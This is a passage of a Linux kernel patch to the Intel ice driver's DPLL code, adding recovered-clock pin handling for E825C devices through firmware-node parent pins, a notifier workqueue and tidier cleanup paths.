DPLL_PIN_STATE_CONNECTED : + DPLL_PIN_STATE_DISCONNECTED; +} + +/** + * ice_dpll_rclk_update_e825c - updates the state of rclk pin on e825c device + * @pf: private board struct + * @pin: pointer to a pin + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update_e825c(struct ice_pf *pf, + struct ice_dpll_pin *pin) +{ + u8 rclk_bits; + int err; + u32 reg; + + if (pf->dplls.rclk.num_parents > ICE_SYNCE_CLK_NUM) + return -EINVAL; + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R10, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK0, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R11, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK1, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + return 0; +} + +/** + * ice_dpll_rclk_update - updates the state of rclk pin on a device + * @pf: private board struct + * @pin: pointer to a pin + * @port_num: port number + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update(struct ice_pf *pf, struct ice_dpll_pin *pin, + u8 port_num) +{ + int ret; + + for (u8 parent = 0; parent < pf->dplls.rclk.num_parents; parent++) { + ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &parent, &port_num, + &pin->flags[parent], NULL); + if (ret) + return ret; + + ice_dpll_pin_store_state(pin, parent, + ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & + pin->flags[parent]); + } + + return 0; +} + /** * ice_dpll_sw_pins_update - update status of all SW pins * @pf: private board struct @@ -668,22 
+755,14 @@ ice_dpll_pin_state_update(struct ice_pf *pf, struct ice_dpll_pin *pin, } break; case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - for (parent = 0; parent < pf->dplls.rclk.num_parents; - parent++) { - u8 p = parent; - - ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &p, - &port_num, - &pin->flags[parent], - NULL); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) { + ret = ice_dpll_rclk_update_e825c(pf, pin); + if (ret) + goto err; + } else { + ret = ice_dpll_rclk_update(pf, pin, port_num); if (ret) goto err; - if (ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & - pin->flags[parent]) - pin->state[parent] = DPLL_PIN_STATE_CONNECTED; - else - pin->state[parent] = - DPLL_PIN_STATE_DISCONNECTED; } break; case ICE_DPLL_PIN_TYPE_SOFTWARE: @@ -1842,6 +1921,40 @@ ice_dpll_phase_offset_get(const struct dpll_pin *pin, void *pin_priv, return 0; } +/** + * ice_dpll_synce_update_e825c - setting PHY recovered clock pins on e825c + * @hw: Pointer to the HW struct + * @ena: true if enable, false in disable + * @port_num: port number + * @output: output pin, we have two in E825C + * + * DPLL subsystem callback. Set proper signals to recover clock from port. 
+ * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +static int ice_dpll_synce_update_e825c(struct ice_hw *hw, bool ena, + u32 port_num, enum ice_synce_clk output) +{ + int err; + + /* configure the mux to deliver proper signal to DPLL from the MUX */ + err = ice_tspll_cfg_bypass_mux_e825c(hw, ena, port_num, output); + if (err) + return err; + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, output); + if (err) + return err; + + dev_dbg(ice_hw_to_dev(hw), "CLK_SYNCE%u recovered clock: pin %s\n", + output, str_enabled_disabled(ena)); + + return 0; +} + /** * ice_dpll_output_esync_set - callback for setting embedded sync * @pin: pointer to a pin @@ -2263,6 +2376,28 @@ ice_dpll_sw_input_ref_sync_get(const struct dpll_pin *pin, void *pin_priv, state, extack); } +static int +ice_dpll_pin_get_parent_num(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int i; + + for (i = 0; i < pin->num_parents; i++) + if (pin->pf->dplls.inputs[pin->parent_idx[i]].pin == parent) + return i; + + return -ENOENT; +} + +static int +ice_dpll_pin_get_parent_idx(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int num = ice_dpll_pin_get_parent_num(pin, parent); + + return num < 0 ? 
num : pin->parent_idx[num]; +} + /** * ice_dpll_rclk_state_on_pin_set - set a state on rclk pin * @pin: pointer to a pin @@ -2286,35 +2421,44 @@ ice_dpll_rclk_state_on_pin_set(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; bool enable = state == DPLL_PIN_STATE_CONNECTED; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; + struct ice_hw *hw; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; + + hw = &pf->hw; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; if ((enable && p->state[hw_idx] == DPLL_PIN_STATE_CONNECTED) || (!enable && p->state[hw_idx] == DPLL_PIN_STATE_DISCONNECTED)) { NL_SET_ERR_MSG_FMT(extack, "pin:%u state:%u on parent:%u already set", - p->idx, state, parent->idx); + p->idx, state, + ice_dpll_pin_get_parent_num(p, parent_pin)); goto unlock; } - ret = ice_aq_set_phy_rec_clk_out(&pf->hw, hw_idx, enable, - &p->freq); + + ret = hw->mac_type == ICE_MAC_GENERIC_3K_E825 ? 
+ ice_dpll_synce_update_e825c(hw, enable, + pf->ptp.port.port_num, + (enum ice_synce_clk)hw_idx) : + ice_aq_set_phy_rec_clk_out(hw, hw_idx, enable, &p->freq); if (ret) NL_SET_ERR_MSG_FMT(extack, "err:%d %s failed to set pin state:%u for pin:%u on parent:%u", ret, - libie_aq_str(pf->hw.adminq.sq_last_status), - state, p->idx, parent->idx); + libie_aq_str(hw->adminq.sq_last_status), + state, p->idx, + ice_dpll_pin_get_parent_num(p, parent_pin)); unlock: mutex_unlock(&pf->dplls.lock); @@ -2344,17 +2488,17 @@ ice_dpll_rclk_state_on_pin_get(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state *state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; ret = ice_dpll_pin_state_update(pf, p, ICE_DPLL_PIN_TYPE_RCLK_INPUT, @@ -2814,7 +2958,8 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, &pins[i].tracker); + if (!IS_ERR_OR_NULL(pins[i].pin)) + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2836,10 +2981,14 @@ static int ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, int start_idx, int count, u64 clock_id) { + u32 pin_index; int i, ret; for (i = 0; i < count; i++) { - pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, + pin_index = start_idx; + if (start_idx != DPLL_PIN_IDX_UNSPEC) + pin_index += i; + pins[i].pin = dpll_pin_get(clock_id, pin_index, THIS_MODULE, &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); @@ -2944,6 +3093,7 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct 
ice_dpll_pin *pins, /** * ice_dpll_deinit_direct_pins - deinitialize direct pins + * @pf: board private structure * @cgu: if cgu is present and controlled by this NIC * @pins: pointer to pins array * @count: number of pins @@ -2955,7 +3105,8 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct ice_dpll_pin *pins, * Release pins resources to the dpll subsystem. */ static void -ice_dpll_deinit_direct_pins(bool cgu, struct ice_dpll_pin *pins, int count, +ice_dpll_deinit_direct_pins(struct ice_pf *pf, bool cgu, + struct ice_dpll_pin *pins, int count, const struct dpll_pin_ops *ops, struct dpll_device *first, struct dpll_device *second) @@ -3024,14 +3175,14 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) { struct ice_dpll_pin *rclk = &pf->dplls.rclk; struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int i; for (i = 0; i < rclk->num_parents; i++) { - parent = pf->dplls.inputs[rclk->parent_idx[i]].pin; - if (!parent) + parent = &pf->dplls.inputs[rclk->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) continue; - dpll_pin_on_pin_unregister(parent, rclk->pin, + dpll_pin_on_pin_unregister(parent->pin, rclk->pin, &ice_dpll_rclk_ops, rclk); } if (WARN_ON_ONCE(!vsi || !vsi->netdev)) @@ -3040,60 +3191,213 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) dpll_pin_put(rclk->pin, &rclk->tracker); } +static bool ice_dpll_is_fwnode_pin(struct ice_dpll_pin *pin) +{ + return !IS_ERR_OR_NULL(pin->fwnode); +} + +static void ice_dpll_pin_notify_work(struct work_struct *work) +{ + struct ice_dpll_pin_work *w = container_of(work, + struct ice_dpll_pin_work, + work); + struct ice_dpll_pin *pin, *parent = w->pin; + struct ice_pf *pf = parent->pf; + int ret; + + wait_for_completion(&pf->dplls.dpll_init); + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; /* DPLL initialization failed */ + + switch (w->action) { + case DPLL_PIN_CREATED: + if (!IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin registered 
*/ + goto out; + } + + /* Grab reference on fwnode pin */ + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_err(ice_pf_to_dev(pf), + "Cannot get fwnode pin reference\n"); + goto out; + } + + /* Register rclk pin */ + pin = &pf->dplls.rclk; + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to register pin: %pe\n", ERR_PTR(ret)); + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + goto out; + } + break; + case DPLL_PIN_DELETED: + if (IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin unregistered */ + goto out; + } + + /* Unregister rclk pin */ + pin = &pf->dplls.rclk; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + + /* Drop fwnode pin reference */ + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + break; + default: + break; + } +out: + kfree(w); +} + +static int ice_dpll_pin_notify(struct notifier_block *nb, unsigned long action, + void *data) +{ + struct ice_dpll_pin *pin = container_of(nb, struct ice_dpll_pin, nb); + struct dpll_pin_notifier_info *info = data; + struct ice_dpll_pin_work *work; + + if (action != DPLL_PIN_CREATED && action != DPLL_PIN_DELETED) + return NOTIFY_DONE; + + /* Check if the reported pin is this one */ + if (pin->fwnode != info->fwnode) + return NOTIFY_DONE; /* Not this pin */ + + work = kzalloc(sizeof(*work), GFP_KERNEL); + if (!work) + return NOTIFY_DONE; + + INIT_WORK(&work->work, ice_dpll_pin_notify_work); + work->action = action; + work->pin = pin; + + queue_work(pin->pf->dplls.wq, &work->work); + + return NOTIFY_OK; +} + /** - * ice_dpll_init_rclk_pins - initialize recovered clock pin + * ice_dpll_init_pin_common - initialize pin * @pf: board private structure * @pin: pin to register * @start_idx: on which index shall allocation start in dpll subsystem * @ops: callback ops registered with the pins * - 
* Allocate resource for recovered clock pin in dpll subsystem. Register the - * pin with the parents it has in the info. Register pin with the pf's main vsi - * netdev. + * Allocate resource for given pin in dpll subsystem. Register the pin with + * the parents it has in the info. * * Return: * * 0 - success * * negative - registration failure reason */ static int -ice_dpll_init_rclk_pins(struct ice_pf *pf, struct ice_dpll_pin *pin, - int start_idx, const struct dpll_pin_ops *ops) +ice_dpll_init_pin_common(struct ice_pf *pf, struct ice_dpll_pin *pin, + int start_idx, const struct dpll_pin_ops *ops) { - struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int ret, i; - if (WARN_ON((!vsi || !vsi->netdev))) - return -EINVAL; - ret = ice_dpll_get_pins(pf, pin, start_idx, ICE_DPLL_RCLK_NUM_PER_PF, - pf->dplls.clock_id); + ret = ice_dpll_get_pins(pf, pin, start_idx, 1, pf->dplls.clock_id); if (ret) return ret; - for (i = 0; i < pf->dplls.rclk.num_parents; i++) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[i]].pin; - if (!parent) { - ret = -ENODEV; - goto unregister_pins; + + for (i = 0; i < pin->num_parents; i++) { + parent = &pf->dplls.inputs[pin->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) { + if (!ice_dpll_is_fwnode_pin(parent)) { + ret = -ENODEV; + goto unregister_pins; + } + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_info(ice_pf_to_dev(pf), + "Mux pin not registered yet\n"); + continue; + } } - ret = dpll_pin_on_pin_register(parent, pf->dplls.rclk.pin, - ops, &pf->dplls.rclk); + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, ops, pin); if (ret) goto unregister_pins; } - dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); return 0; unregister_pins: while (i) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[--i]].pin; - dpll_pin_on_pin_unregister(parent, pf->dplls.rclk.pin, - &ice_dpll_rclk_ops, &pf->dplls.rclk); + 
parent = &pf->dplls.inputs[pin->parent_idx[--i]]; + if (IS_ERR_OR_NULL(parent->pin)) + continue; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, ops, pin); } - ice_dpll_release_pins(pin, ICE_DPLL_RCLK_NUM_PER_PF); + ice_dpll_release_pins(pin, 1); + return ret; } +/** + * ice_dpll_init_rclk_pin - initialize recovered clock pin + * @pf: board private structure + * @start_idx: on which index shall allocation start in dpll subsystem + * @ops: callback ops registered with the pins + * + * Allocate resource for recovered clock pin in dpll subsystem. Register the + * pin with the parents it has in the info. + * + * Return: + * * 0 - success + * * negative - registration failure reason + */ +static int +ice_dpll_init_rclk_pin(struct ice_pf *pf, int start_idx, + const struct dpll_pin_ops *ops) +{ + struct ice_vsi *vsi = ice_get_main_vsi(pf); + int ret; + + ret = ice_dpll_init_pin_common(pf, &pf->dplls.rclk, start_idx, ops); + if (ret) + return ret; + + dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); + + return 0; +} + +static void +ice_dpll_deinit_fwnode_pin(struct ice_dpll_pin *pin) +{ + unregister_dpll_notifier(&pin->nb); + flush_workqueue(pin->pf->dplls.wq); + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; +} + +static void +ice_dpll_deinit_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + int i; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + destroy_workqueue(pf->dplls.wq); +} + /** * ice_dpll_deinit_pins - deinitialize direct pins * @pf: board private structure @@ -3113,6 +3417,8 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) struct ice_dpll *dp = &d->pps; ice_dpll_deinit_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); if (cgu) { ice_dpll_unregister_pins(dp->dpll, inputs, 
&ice_dpll_input_ops, num_inputs); @@ -3127,12 +3433,12 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) &ice_dpll_output_ops, num_outputs); ice_dpll_release_pins(outputs, num_outputs); if (!pf->dplls.generic) { - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, @@ -3141,6 +3447,141 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) } } +static struct fwnode_handle * +ice_dpll_pin_node_get(struct ice_pf *pf, const char *name) +{ + struct fwnode_handle *fwnode = dev_fwnode(ice_pf_to_dev(pf)); + int index; + + index = fwnode_property_match_string(fwnode, "dpll-pin-names", name); + if (index < 0) + return ERR_PTR(-ENOENT); + + return fwnode_find_reference(fwnode, "dpll-pins", index); +} + +static int +ice_dpll_init_fwnode_pin(struct ice_dpll_pin *pin, const char *name) +{ + struct ice_pf *pf = pin->pf; + int ret; + + pin->fwnode = ice_dpll_pin_node_get(pf, name); + if (IS_ERR(pin->fwnode)) { + dev_err(ice_pf_to_dev(pf), + "Failed to find %s firmware node: %pe\n", name, + pin->fwnode); + pin->fwnode = NULL; + return -ENODEV; + } + + dev_dbg(ice_pf_to_dev(pf), "Found fwnode node for %s\n", name); + + pin->pin = fwnode_dpll_pin_find(pin->fwnode, &pin->tracker); + if (IS_ERR_OR_NULL(pin->pin)) { + dev_info(ice_pf_to_dev(pf), + "DPLL pin for %pfwp not registered yet\n", + pin->fwnode); + pin->pin = NULL; + } + + pin->nb.notifier_call = ice_dpll_pin_notify; + ret = register_dpll_notifier(&pin->nb); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to subscribe for DPLL notifications\n"); + + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; + 
+ return ret; + } + + return ret; +} + +/** + * ice_dpll_init_fwnode_pins - initialize pins from device tree + * @pf: board private structure + * @pins: pointer to pins array + * @start_idx: starting index for pins + * @count: number of pins to initialize + * + * Initialize input pins for E825 RCLK support. The parent pins (rclk0, rclk1) + * are expected to be defined by the system firmware (ACPI). This function + * allocates them in the dpll subsystem and stores their indices for later + * registration with the rclk pin. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int +ice_dpll_init_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + char pin_name[8]; + int i, ret; + + pf->dplls.wq = create_singlethread_workqueue("ice_dpll_wq"); + if (!pf->dplls.wq) + return -ENOMEM; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) { + pins[start_idx + i].pf = pf; + snprintf(pin_name, sizeof(pin_name), "rclk%u", i); + ret = ice_dpll_init_fwnode_pin(&pins[start_idx + i], pin_name); + if (ret) + goto error; + } + + return 0; +error: + while (i--) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + + destroy_workqueue(pf->dplls.wq); + + return ret; +} + +/** + * ice_dpll_init_pins_e825 - init pins and register pins with a dplls + * @pf: board private structure + * @cgu: if cgu is present and controlled by this NIC + * + * Initialize directly connected pf's pins within pf's dplls in a Linux dpll + * subsystem. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int ice_dpll_init_pins_e825(struct ice_pf *pf) +{ + int ret; + + ret = ice_dpll_init_fwnode_pins(pf, pf->dplls.inputs, 0); + if (ret) + return ret; + + ret = ice_dpll_init_rclk_pin(pf, DPLL_PIN_IDX_UNSPEC, + &ice_dpll_rclk_ops); + if (ret) { + /* Inform DPLL notifier works that DPLL init was finished + * unsuccessfully (ICE_DPLL_FLAG not set). 
+ */ + complete_all(&pf->dplls.dpll_init); + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); + } + + return ret; +} + /** * ice_dpll_init_pins - init pins and register pins with a dplls * @pf: board private structure @@ -3155,21 +3596,24 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) */ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) { + const struct dpll_pin_ops *output_ops; + const struct dpll_pin_ops *input_ops; int ret, count; + input_ops = &ice_dpll_input_ops; + output_ops = &ice_dpll_output_ops; + ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.inputs, 0, - pf->dplls.num_inputs, - &ice_dpll_input_ops, - pf->dplls.eec.dpll, pf->dplls.pps.dpll); + pf->dplls.num_inputs, input_ops, + pf->dplls.eec.dpll, + pf->dplls.pps.dpll); if (ret) return ret; count = pf->dplls.num_inputs; if (cgu) { ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.outputs, - count, - pf->dplls.num_outputs, - &ice_dpll_output_ops, - pf->dplls.eec.dpll, + count, pf->dplls.num_outputs, + output_ops, pf->dplls.eec.dpll, pf->dplls.pps.dpll); if (ret) goto deinit_inputs; @@ -3205,30 +3649,30 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) } else { count += pf->dplls.num_outputs + 2 * ICE_DPLL_PIN_SW_NUM; } - ret = ice_dpll_init_rclk_pins(pf, &pf->dplls.rclk, count + pf->hw.pf_id, - &ice_dpll_rclk_ops); + + ret = ice_dpll_init_rclk_pin(pf, count + pf->ptp.port.port_num, + &ice_dpll_rclk_ops); if (ret) goto deinit_ufl; return 0; deinit_ufl: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_ufl_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, + &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_sma: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_sma_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, + 
&ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_outputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.outputs, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.outputs, pf->dplls.num_outputs, - &ice_dpll_output_ops, pf->dplls.pps.dpll, + output_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); deinit_inputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.inputs, pf->dplls.num_inputs, - &ice_dpll_input_ops, pf->dplls.pps.dpll, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.inputs, + pf->dplls.num_inputs, + input_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); return ret; } @@ -3239,8 +3683,8 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) * @d: pointer to ice_dpll * @cgu: if cgu is present and controlled by this NIC * - * If cgu is owned unregister the dpll from dpll subsystem. - * Release resources of dpll device from dpll subsystem. + * If cgu is owned, unregister the DPL from DPLL subsystem. + * Release resources of DPLL device from DPLL subsystem. */ static void ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) @@ -3257,8 +3701,8 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) * @cgu: if cgu is present and controlled by this NIC * @type: type of dpll being initialized * - * Allocate dpll instance for this board in dpll subsystem, if cgu is controlled - * by this NIC, register dpll with the callback ops. + * Allocate DPLL instance for this board in dpll subsystem, if cgu is controlled + * by this NIC, register DPLL with the callback ops. 
* * Return: * * 0 - success @@ -3289,6 +3733,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { dpll_device_put(d->dpll, &d->tracker); + d->dpll = NULL; return ret; } d->ops = ops; @@ -3506,6 +3951,26 @@ ice_dpll_init_info_direct_pins(struct ice_pf *pf, return ret; } +/** + * ice_dpll_init_info_pin_on_pin_e825c - initializes rclk pin information + * @pf: board private structure + * + * Init information for rclk pin, cache them in pf->dplls.rclk. + * + * Return: + * * 0 - success + */ +static int ice_dpll_init_info_pin_on_pin_e825c(struct ice_pf *pf) +{ + struct ice_dpll_pin *rclk_pin = &pf->dplls.rclk; + + rclk_pin->prop.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + rclk_pin->prop.capabilities |= DPLL_PIN_CAPABILITIES_STATE_CAN_CHANGE; + rclk_pin->pf = pf; + + return 0; +} + /** * ice_dpll_init_info_rclk_pin - initializes rclk pin information * @pf: board private structure @@ -3632,7 +4097,10 @@ ice_dpll_init_pins_info(struct ice_pf *pf, enum ice_dpll_pin_type pin_type) case ICE_DPLL_PIN_TYPE_OUTPUT: return ice_dpll_init_info_direct_pins(pf, pin_type); case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - return ice_dpll_init_info_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + return ice_dpll_init_info_pin_on_pin_e825c(pf); + else + return ice_dpll_init_info_rclk_pin(pf); case ICE_DPLL_PIN_TYPE_SOFTWARE: return ice_dpll_init_info_sw_pins(pf); default: @@ -3654,6 +4122,50 @@ static void ice_dpll_deinit_info(struct ice_pf *pf) kfree(pf->dplls.pps.input_prio); } +/** + * ice_dpll_init_info_e825c - prepare pf's dpll information structure for e825c + * device + * @pf: board private structure + * + * Acquire (from HW) and set basic DPLL information (on pf->dplls struct). 
+ * + * Return: + * * 0 - success + * * negative - init failure reason + */ +static int ice_dpll_init_info_e825c(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int ret = 0; + int i; + + d->clock_id = ice_generate_clock_id(pf); + d->num_inputs = ICE_SYNCE_CLK_NUM; + + d->inputs = kcalloc(d->num_inputs, sizeof(*d->inputs), GFP_KERNEL); + if (!d->inputs) + return -ENOMEM; + + ret = ice_get_cgu_rclk_pin_info(&pf->hw, &d->base_rclk_idx, + &pf->dplls.rclk.num_parents); + if (ret) + goto deinit_info; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + pf->dplls.rclk.parent_idx[i] = d->base_rclk_idx + i; + + ret = ice_dpll_init_pins_info(pf, ICE_DPLL_PIN_TYPE_RCLK_INPUT); + if (ret) + goto deinit_info; + dev_dbg(ice_pf_to_dev(pf), + "%s - success, inputs: %u, outputs: %u, rclk-parents: %u\n", + __func__, d->num_inputs, d->num_outputs, d->rclk.num_parents); + return 0; +deinit_info: + ice_dpll_deinit_info(pf); + return ret; +} + /** * ice_dpll_init_info - prepare pf's dpll information structure * @pf: board private structure @@ -3773,14 +4285,16 @@ void ice_dpll_deinit(struct ice_pf *pf) ice_dpll_deinit_worker(pf); ice_dpll_deinit_pins(pf, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.pps.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.eec.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); ice_dpll_deinit_info(pf); mutex_destroy(&pf->dplls.lock); } /** - * ice_dpll_init - initialize support for dpll subsystem + * ice_dpll_init_e825 - initialize support for dpll subsystem * @pf: board private structure * * Set up the device dplls, register them and pins connected within Linux dpll @@ -3789,7 +4303,43 @@ void ice_dpll_deinit(struct ice_pf *pf) * * Context: Initializes pf->dplls.lock mutex. 
*/ -void ice_dpll_init(struct ice_pf *pf) +static void ice_dpll_init_e825(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int err; + + mutex_init(&d->lock); + init_completion(&d->dpll_init); + + err = ice_dpll_init_info_e825c(pf); + if (err) + goto err_exit; + err = ice_dpll_init_pins_e825(pf); + if (err) + goto deinit_info; + set_bit(ICE_FLAG_DPLL, pf->flags); + complete_all(&d->dpll_init); + + return; + +deinit_info: + ice_dpll_deinit_info(pf); +err_exit: + mutex_destroy(&d->lock); + dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); +} + +/** + * ice_dpll_init_e810 - initialize support for dpll subsystem + * @pf: board private structure + * + * Set up the device dplls, register them and pins connected within Linux dpll + * subsystem. Allow userspace to obtain state of DPLL and handling of DPLL + * configuration requests. + * + * Context: Initializes pf->dplls.lock mutex. + */ +static void ice_dpll_init_e810(struct ice_pf *pf) { bool cgu = ice_is_feature_supported(pf, ICE_F_CGU); struct ice_dplls *d = &pf->dplls; @@ -3829,3 +4379,15 @@ void ice_dpll_init(struct ice_pf *pf) mutex_destroy(&d->lock); 